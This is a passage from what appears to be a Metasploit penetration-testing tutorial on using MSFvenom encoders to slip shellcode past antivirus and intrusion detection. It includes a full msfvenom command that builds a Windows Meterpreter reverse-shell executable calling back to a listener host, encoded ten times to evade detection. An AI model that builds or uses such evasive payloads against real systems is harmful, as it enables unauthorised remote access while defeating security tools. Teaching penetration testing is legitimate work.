Encoders
Generating payloads is just the first step; nowadays security products, such as Intrusion Detection Systems (IDSs), antivirus and anti-malware software, can easily pick up the shellcode generated by MSFvenom. To help us evade security, we can use encoders to encode our shellcode.
How to do it...
- By using MSFconsole with the
show encoders
option, or by browsing to the/usr/share/metasploit-framework/modules/encoders/
folder in our Kali Linux machine, we can see all the encoders available on the Metasploit Framework:
msf > show encoders
- To encode one of our previous payloads, we simple add the
-e
option, followed by the encoder we want to use, and, if we so choose, we can use the-i
option, followed by the number of times to encode the payload:
msf > msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -f exe -e x86/shikata_ga_nai -i 10 -o encoded.exe [*] exec: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168...